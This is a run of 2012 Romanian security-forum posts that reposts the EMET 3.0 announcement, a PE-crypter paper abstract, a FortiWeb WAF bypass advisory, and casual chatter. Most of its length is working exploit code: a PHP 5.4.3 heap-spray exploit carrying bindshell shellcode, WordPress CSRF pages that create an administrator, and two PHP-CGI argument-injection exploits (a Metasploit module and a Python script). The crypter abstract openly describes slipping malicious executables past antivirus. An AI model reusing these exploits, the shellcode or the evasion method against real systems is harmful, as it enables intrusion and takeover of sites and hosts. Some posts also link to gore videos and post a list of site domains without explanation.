Nytro

Enhanced Mitigation Experience Toolkit (EMET) - EMET 3.0. [h=3]Introducing EMET v3[/h] swiat 15 May 2012 11:00 AM We are pleased to announce the release of a new version of our Enhanced Mitigation Experience Toolkit (EMET) - EMET 3.0. EMET it is a free utility that helps prevent vulnerabilities in software from being successfully exploited for code execution. It does so by opt-ing in software to the latest security mitigation technologies. The result is that a wide variety of software is made significantly more resistant to exploitation – even against zero day vulnerabilities and vulnerabilities for which an update has not yet been applied. Download it here: Download: EMET - Microsoft Download Center - Download Details This new version of the tool being released today addresses top feedback themes we have heard from users: EMET needs more enterprise configuration, deployment and reporting options. We have seen growing interest in adoption from enterprise and large scale networks and this new version includes enhancements for that segment. Here are some of the highlights of and new features in EMET 3.0. Making configuration easy Enterprise deployment via Group Policy and SCCM Reporting capability via the new EMET Notifier feature Configuration EMET 3.0 comes with three default "Protection Profiles". Protection Profiles are XML files that contain pre-configured EMET settings for common Microsoft and third-party applications. Under EMET’s installation directory, these files are in the Deployment\Protection Profiles folder. You can enable them as-is, modify them, or create new protection profiles based on them. The three profiles that ship with EMET 3.0 are: Internet Explorer.xml: Enables mitigations for supported versions of Microsoft Internet Explorer. Office Software.xml: Enables mitigations for supported versions of Microsoft Internet Explorer, applications that are part of the Microsoft Office suite, Adobe Acrobat 8-10 and Adobe Acrobat Reader 8-10. All.xml: Enables mitigations for common home and enterprise applications, including Microsoft Internet Explorer and Microsoft Office. Looking inside a profile, we see a list of programs with EMET mitigations. The example below shows all EMET mitigations enabled for Windows Media Player, with the exception of Mandatory ASLR: <Product Name="Windows Media player"> <Version Path="*\Windows Media Player\wmplayer.exe"> <Mitigation Enabled="false" Name="MandatoryASLR"/> </Version> </Product> Notice the “*” in the Path attribute above? In EMET 3.0, we also expanded the EMET grammar rules. Existing rules that you might have continue to work as-is and it is possible now to also use wildcards in EMET rules. This means that you no longer have to use the full path of an application in EMET rules. You can use the “*” character or simply use the image name, such as “iexplore.exe” in your rules. EMET will protect them regardless of where these applications may be installed. This has been one of the most requested features. Deployment EMET also comes with built-in support for enterprise deployment and configuration technologies. This enables administrators to use Group Policy or System Center Configuration Manager to deploy, configure and monitor EMET installations across the enterprise environment. For Group Policy: EMET includes an ADMX file that contains the three protection profiles mentioned above as policies that can be enabled/disabled through group policy. There is also a policy that demonstrates how to add custom EMET settings. For System Center Configuration Manager: The SCCM team blog post this morning provides a package and instructions for integration with various SCCM features. Read that blog post here: Welcome to Windows Live Reporting With EMET 3.0, we have included an additional new reporting capability that we call "EMET Notifier". When you install EMET 3.0, this lightweight component is set to automatically start with Windows. It will show up in the notification area of your taskbar with an EMET 3.0 icon. EMET Notifier has two duties: Write events out to the Windows Event Log Show important events via a tooltip in the taskbar notification area EMET events are logged via the event source called EMET. These logs can be found in the Application log. There are three levels: Information, Warning and Error. Information messages are used for logging usual operation such as the EMET Notifier starting. Warning messages are used when EMET settings change. Error messages are used for logging cases where EMET stopped an application with one of its mitigations, which means an active attack has been blocked. An example entry can be seen below. In addition to the error messages written to the Windows Event Log, when an EMET mitigation stops (crashes) an application by blocking an exploit, a message is displayed for the user. A toast style taskbar notification states which application is being stopped and which mitigation is causing EMET to stop it. You can see an example below. Other EMET v3 developments In addition to these features, EMET 3.0 comes with a number of other improvements and bug fixes. More details and a FAQ can be found in the User Guide that comes with the install. However, we would like to specifically highlight a couple of things here. First, we have tested EMET 3.0 on the Windows 8 Consumer Preview and it works great - we encountered no problems at all so we encourage you to use EMET on all versions of Windows. Second, EMET 3.0 can be installed just fine on a system where EMET 2.1 (the previous release) was already installed. An upgrade or a new installation is no different. Your existing rules built for EMET 2.1 will continue to work just fine with EMET 3.0. Third, we would like to point out that EMET is an officially-supported Microsoft tool. That is a question we get a lot from enterprise customers. Microsoft's Customer Service & Support team offers forums-based support via Enhanced Mitigation Experience Toolkit (EMET) Support Forum. We in MSRC Engineering are also very eager to promote EMET and help you use it so we are quick to respond to feedback, ideas, suggestions, or questions via switech -at- microsoft -dot- com. Please do not hesitate to reach out to us. Acknowledgements I would like to thank Chengyun Chu, Elias Bachaalany, Elia Florio, Jinwook Shin, Neil Sikka, and Nitin Kumar Goel for their various contributions to this release. Also a big thank you to Jason Githens and Hema Rajalakshmi from the System Center Configuration Manager team for their help and support. - Suha Can, MSRC Engineering (EMET 3.0 release owner) Sursa: Introducing EMET v3 - Security Research & Defense - Site Home - TechNet Blogs

Da, deci e o porcarie, daca tot faci sniffing iei cookie/session, nu cred ca se face logare pe baza de IP sau mai stiu eu ce.

Hyperion: Implementation of a PE-Crypter Christian Ammann May 8, 2012 1 Introduction Runtime crypter accepts binary executable files as input and transforms them into an encrypted version (preserving its original behaviour). The encrypted file decrypts itself on startup and executes it’s original content. This approach allows the deployment of malicious executables in protected environments: A pattern based anti virus (AV) solution detects the signature of suspicious files and blocks their execution. The encrypted counterpart contains an unknown signature, it’s content can not be analysed by heuristics and is therefore executed normally without an intervention by the AV scanner. Other uses are protection of binaries against reversing or the replacement of the encryption routine with a packer to reduce the size of an executable. This paper reveals the theoretic aspects behind run-time crypters and describes a reference implementation for Portable Executables (PE) [1] which is the windows file format for dynamic-link libraries (DLLs), object files and regular executables. The encryption of Windows executables requires a general understanding of the following aspects: PE layout: The PE header, section headers and data directory entries. PE loader: How and where are process images loaded and executed in virtual memory. We give a beginner friendly introduction to these two important topics in section 2. Afterwards, we present and explain the PE crypter reference implementation Hyperion in section 3 for 32-bit executables which can be divided into two parts (see figure 1 for details): A crypter and a container. The crypter (which is explained in more detail in section 3.1) gets a PE binary as input, copies the complete input file into memory, calculates a checksum and prepends the checksum to the input file. Afterwards, a random key is generated which is used to encrypt the checksum and the input file with the AES-128 [2] encryption algorithm. Finally, the encrypted result is copied into the containers data section. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf

[h=1]PHP 5.4 (5.4.3) Code Execution (Win32)[/h] // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)email(at)gmail.com // * Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched (Polish) =================== offset-brute.html =================== <html><body> <title>0day</title> <center> <font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br> <textarea rows=50 cols=50 id="log"></textarea> </center> <script> function sleep(milliseconds) { var start = new Date().getTime(); for (var i = 0; i < 1e7; i++) { if ((new Date().getTime() - start) > milliseconds){ break; } } } function makeRequest(url, parameters) { var xmlhttp = new XMLHttpRequest(); if (window.XMLHttpRequest) { xmlhttp = new XMLHttpRequest(); if (xmlhttp.overrideMimeType) { xmlhttp.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { // IE try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!xmlhttp) { alert('Giving up Cannot create an XMLHTTP instance'); return false; } xmlhttp.open("GET",url,true); xmlhttp.send(null); return true; } test=document.getElementById("log"); for(offset=0;offset<300;offset++) { log.value+="Trying offset:"+offset+"\r\n"; makeRequest("0day.php?offset="+offset); sleep(500); } </script></body></html> =================== 0day.php =================== <?php $spray = str_repeat("\x90",0x200); $offset=$_GET['offset']; // 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll] $spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1); // :> 0x048d0030 $spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); //0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll] $spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); // Adress of VirtualProtect 0x7c801ad4 $spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1); // LPVOID lpAddress = 0x048d0060 $spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1); // SIZE_T dwSize = 0x01000000 $spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1); // DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 $spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1); // __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000 // 0x048d0068 $spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1); //0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll] $spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4); // Ret Address = 0x048d0080 $spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); $stacktrack = "\xbc\x0c\xb0\xc0\x00"; // Universal win32 bindshell on port 1337 from metasploit $shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0". "\x81\xc4\xd0\xfd\xff\xff". "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d". "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96". "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2". "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0". "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41". "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82". "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2". "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39". "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9". "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b". "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a". "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88". "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01". "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20". "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e". "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39". "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44". "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96". "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38". "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9". "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09". "\x4e\x33\xe4\x96\xcd\xcc\x32\x69"; $spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); $fullspray=""; for($i=0;$i<0x4b00;$i++) { $fullspray.=$spray; } $j=array(); $e=array(); $b=array(); $a=array(); $c=array(); array_push($j,$fullspray); array_push($e,$fullspray."W"); array_push($b,$fullspray."A"); array_push($a,$fullspray."S"); array_push($c,$fullspray."!"); $vVar = new VARIANT(0x048d0038+$offset); // Shoot him com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10] echo $arr; echo $spray; ?> Sursa: PHP 5.4 (5.4.3) Code Execution (Win32)

Ok, cand ajung acasa diseara, spuneti pe mess sa nu uit.

Nu e pentru tine probabil.

Aaaaanntoneescuu de traiaaa...

Utilizatorului unu_1234567 i-a fost scos rangul de V.I.P. pentru ca a profitat de acest aspect pentru a castiga incredere. Nu va primi ban, in niciun caz, datorita contributiile sale, cei cu vechime vor intelege. Speram sa nu se repete. Ramane la latitudinea voastra sa decideti "castigatorul" moral al disputei si daca va veti implica in trade-uri cu ei, tineti insa cont ca amandoi sunt persoane care merita respect, desi multi probabil nu stiti nimic despre ei.

Nu sunt fake tinere, in Africa inca se ard femei pe rug pentru vrajitorie, realitatea e dura. In Tibet calugaritele isi dau foc singure: Self Immolation Video of Buddhist Nun Palden Choetso in Tibet | Best Gore Self Immolation of a Nun in Tibet | Best Gore Apoi, in mijlocu "civilizatiei": http://www.bestgore.com/execution/african-man-lynched-burned-alive-gay-necklacing-failed/

Pff, nu imi place cum e facuta libraria, exemplul http://rolling-curl.googlecode.com/svn/trunk/example_groups.php nu cred ca te ajuta. Foloseste curl simplu, cu curl_multi_exec.

Photoshop CS5 (12.04 parca) crapa, dar nu se executa shellcode-ul. Are cineva CS5.1 sa incerce?

[TABLE=width: 720] [TR] [TD]1.[/TD] [TD]casadinpitesti.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]2.[/TD] [TD]smartprices.info[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]3.[/TD] [TD]www.activineuropa.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]4.[/TD] [TD]www.originalhandmade.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]5.[/TD] [TD]activineuropa.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]6.[/TD] [TD]www.ice-tropez.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]7.[/TD] [TD]www.novelresearch.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]8.[/TD] [TD]www.perlamamaia.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]9.[/TD] [TD]daune-auto.com[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]10.[/TD] [TD]www.daune-auto.com[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]11.[/TD] [TD]www.enovate.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]12.[/TD] [TD]www.casa-agave.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]13.[/TD] [TD]www.uniromexim.ro[/TD] [TD]Whois [+][/TD] [/TR] [/TABLE] Prietenii stiu de ce.

Sunt baieti buni amandoi (din alte puncte de vedere), vom vedea diseara ce e de facut.

PHP-CGI Exploitation by Example - SpiderLabs Anterior

[h=1]Descarca BitDefender Total Security 2013 Beta – Testarea a inceput[/h] By Radu FaraVirusi(com) on May 7, 2012 BitDefender anunta lansarea produsului BitDefender Total Security 2013 Beta, care poate fi evaluat gratuit timp de 60 de zile. Ce noutati aduce? Device Anti-Theft USB Immunizer Windows Widget imbunatatiri aduse Parental Control, BitDefender SafeBox, MyBitDefender Dashboard Pentru a descarca BitDefender Total Security 2013 Beta accesati: Bitdefender Total Security 2013 BETA Sursa: Descarca BitDefender Total Security 2013 Beta – Testarea a inceput

[h=1]Fortinet FortiWeb Web Application Firewall Policy Bypass[/h] BINAR10 Report on Fortinet Fortiweb Findings 02/05/2012 - Fortinet FortiWeb Web Application Firewall Policy Bypass - ============================================================ 1) Affected Product Fabricant: Fortinet Product name: FortiWeb Version: Latest update to Tue, 2 May 2012 Type: Web Application Firewall Product URL: http://www.fortinet.com/products/fortiweb/index.html 2) Description of the Findings BINAR10 has found a policy bypass occurrence when large size data is sent in POST (data) or GET request. 3) Technical Details 3.1. POST Request Example When is appended to a POST request any padding data that surpasses 2399 bytes, the WAF do not inspect the data sent and the request hits directly the application. This should occur when the product is not configured to block malformed requests, but this feature also check the POST size limit, blocking the request if it surpass a fixed limit, therefore is likely that is being disabled due to application requirements in medium size forms. The response is also not verified by the WAF and information disclosure occurs with details of the infrastructure. This bypass could be used to inject different types of vectors, as is shown in the example only is needed to append a new variable at the end of the POST data filled with arbitrary data that exceeds 2399 bytes. ---POST example POST /<path>/login-app.aspx HTTP/1.1 Host: <host> User-Agent: <any valid user agent string> Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: <the content length must be at least 2399 bytes> var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes> 3.2. GET Requests The same issue with POST Request but it could be done through the sending arbitrary data at the end of the URL. --GET example http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data> 4. Validation Required It requires the validation of other researchers who have access to product. 5. Time Table 04/27/2012 - Vendor notified. 04/27/2012 - Vendor response, requiring some tests. 05/02/2012 - Vendor indicates that this is a configuration problem and not a product vulnerability. 6. Credits Geffrey Velasquez <geffrey at gmail.com> at BINAR10 S.A.C. Sursa: Fortinet FortiWeb Web Application Firewall Policy Bypass

The curious case of Benjamin Button Sherlok Holmes Ring of the nibelungs The illusionist The librarian Butterfly effect Dark floors Room 1408 The cube The eye Triangle Nu neaparat psihologice, dar care merita vazute.

Eu l-am mutat acolo (de la Anunturi + warn), nu stiam unde altundeva. Calm.

Pe aici v-ati uitat: oberhumer.com: LZO real-time data compression library ?

[h=1]Wordpress 3.3.1 Multiple CSRF Vulnerabilities[/h] +---------------------------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Wordpress 3.3.1 Multiple CSRF Vulnerabilities # Date : 19-03-2012 # Author : Ivano Binetti (http://www.ivanobinetti.com) # Software link : http://wordpress.org/wordpress-3.3.1.zip # Vendor site : http://wordpress.org # Version : 3.3.1 (and lower). Probably also version 3.3.2 is affected. # Tested on : Debian Squeeze (6.0) # Original Advisory : http://www.webapp-security.com/2012/04/wordpress-3-3-1-multiple-csrf-vulnerabilities/ # CVE : CVE-2012-1936 # OSVDB ID : 81588 # Bugtraq ID : 53280 +---------------------------------------------------------------------------------------------------------------------------------------------------+ Summary 1)Introduction 2)Vulnerabilities Description 2.1 Multiple CSRF 3)Exploit 3.1 CSRF (Change Post Title) 3.2 CSRF (Add Admin) +---------------------------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction WordPress "is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time." 2)Vulnerability Description 2.1 Multiple CSRF Wordpress 3.3.1 suffers from multiple CSRF vulnerabilities which allow an attacker to change post title, add administrators/users, delete administrators/users, approve and unapprove comment, delete comment, change background image, insert custom header image, change site title, change administrator's email, change Wordpress Address, change Site Address, when an authenticated user/admin browses a special crafted web page. May be other parameters can be modified. This vulnerability is caused by a security flaw in anti-CSRF token (_wpnonce, _wpnonce_create-user, _ajax_nonce, _wpnonce-custom-background-upload, _wpnonce-custom-header-upload) generation. For some operations (see below) above specified anti-CSRF tokens are not associated with the current user session (as Owasp recommends) but are the are valid for all operations (for a specific administrator/user) within 12 hour. The above described vulnerability allows an attacker - who has sniffed anti-CSRF token - to have 12 hour to perform a CSRF attack. For Owasp recommendation about anti-CSRF token, you can read the following document: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet#General_Recommendation:_Synchronizer_Token_Pattern This problem affects the following operations: - Add Admin/User - Delete Admin/User - Approve comment - Unapprove comment - Delete comment - Change background image - Insert custom header image - Change site title - Change administrator's email - Change Wordpress Address - Change Site Address Other operations (like insert a new post) are not affected by this CSRF vulnerability. In this Advisory I will only demonstrate how to change post title and how to add a new administrator account. 3)Exploit 3.1 CSRF (Change Post Title) <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to change post title</H2> <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php"> <input type="hidden" name="post_title" value="hackedtitle"/> <input type="hidden" name="post_name" value="hackedtitle"/> <input type="hidden" name="mm" value="03"/> <input type="hidden" name="jj" value="16"/> <input type="hidden" name="aa" value="2012"/> <input type="hidden" name="hh" value=""/> <input type="hidden" name="mn" value=""/> <input type="hidden" name="ss" value=""/> <input type="hidden" name="post_author" value="1"/> <input type="hidden" name="post_password" value=""/> <input type="hidden" name="post_category%5B%5D" value="0"/> <input type="hidden" name="post_category%5B%5D" value="1"/> <input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/> <input type="hidden" name="comment_status" value="open"/> <input type="hidden" name="ping_status" value="open"/> <input type="hidden" name="_status" value="publish"/> <input type="hidden" name="post_format" value="0"/> <input type="hidden" name="_inline_edit" value="<sniffed_value>"/> <input type="hidden" name="post_view" value="list"/> <input type="hidden" name="screen" value="edit-post"/> <input type="hidden" name="action" value="inline-save"/> <input type="hidden" name="post_type" value="post"/> <input type="hidden" name="post_ID" value="1"/> <input type="hidden" name="edit_date" value="true"/> <input type="hidden" name="post_status" value="all"/> </form> </body> </html> Note: this exploit simulate changing of post title using "Quick Edit" function 3.2 CSRF (Add Admin) <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to add Administrator</H2> <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php"> <input type="hidden" name="action" value="createuser"/> <input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/> <input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/> <input type="hidden" name="user_login" value="admin2"/> <input type="hidden" name="email" value="admin2@admin.com"/> <input type="hidden" name="first_name" value="admin2@admin.com"/> <input type="hidden" name="last_name" value=""/> <input type="hidden" name="url" value=""/> <input type="hidden" name="pass1" value="password"/> <input type="hidden" name="pass2" value="password"/> <input type="hidden" name="role" value="administrator"/> <input type="hidden" name="createuser" value="Add+New+User+"/> </form> </body> </html> +--------------------------------------------------------------------------------------------------------------------------------------------------+ Sursa: Wordpress 3.3.1 Multiple CSRF Vulnerabilities

[h=1]PHP CGI Argument Injection[/h] ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PHP CGI Argument Injection', 'Description' => %q{ When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the "encoded in a system-defined manner" from the RFC) and then passes them to the CGI binary." }, 'Author' => [ 'egypt', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ "CVE" , "2012-1823" ], [ "URL" , "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/" ], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as an HTTP # response body, so really it's unlimited 'Space' => 262144, # 256k }, 'DisclosureDate' => 'May 03 2012', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]), ], self.class) end # php-cgi -h # ... # -s Display colour syntax highlighted source. def check uri = target_uri.path uri.gsub!(/\?.*/, "") print_status("Checking uri #{uri}") response = send_request_raw({ 'uri' => uri }) if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable") return Exploit::CheckCode::Unknown end response = send_request_raw({ 'uri' => uri + '?-s'}) if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi return Exploit::CheckCode::Vulnerable end print_error("Server responded indicating it was not vulnerable") return Exploit::CheckCode::Safe end def exploit begin args = [ "-d+allow_url_include%3d#{rand_php_ini_true}", "-d+safe_mode%3d#{rand_php_ini_false}", "-d+suhosin.simulation%3d#{rand_php_ini_true}", "-d+disable_functions%3d%22%22", "-d+open_basedir%3dnone", "-d+auto_prepend_file%3dphp://input", "-n" ] qs = args.join("+") uri = "#{target_uri}?#{qs}" # Has to be all on one line, so gsub out the comments and the newlines payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "") response = send_request_cgi( { 'method' => "POST", 'global' => true, 'uri' => uri, 'data' => payload_oneline, }, 0.5) handler rescue ::Interrupt raise $! rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused print_error("The target service unreachable") rescue ::OpenSSL::SSL::SSLError print_error("The target failed to negotiate SSL, is this really an SSL service?") end end def rand_php_ini_false Rex::Text.to_rand_case([ "0", "off", "false" ][rand(3)]) end def rand_php_ini_true Rex::Text.to_rand_case([ "1", "on", "true" ][rand(3)]) end end [h=1]PHP CGI Argument Injection Exploit[/h] ###################################################################################### # Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit # Date: May 4, 2012 # Author: rayh4c[0x40]80sec[0x2e]com # Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com ###################################################################################### import socket import sys def cgi_exploit(): pwn_code = """<?php phpinfo();?>""" post_Length = len(pwn_code) http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1 Host: %s Content-Type: application/x-www-form-urlencoded Content-Length: %s %s """ %(HOST , post_Length ,pwn_code) print http_raw try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((HOST, int(PORT))) sock.send(http_raw) data = sock.recv(10000) print repr(data) sock.close() except socket.error, msg: sys.stderr.write("[ERROR] %s\n" % msg[1]) sys.exit(1) if __name__ == '__main__': try: HOST = sys.argv[1] PORT = sys.argv[2] cgi_exploit() except IndexError: print '[+]Usage: cgi_test.py site.com 80' sys.exit(-1) Surse: - PHP CGI Argument Injection - PHP CGI Argument Injection Exploit

Bun, data si ora?

Esti in Bucuresti? Ne bagam la o bauta?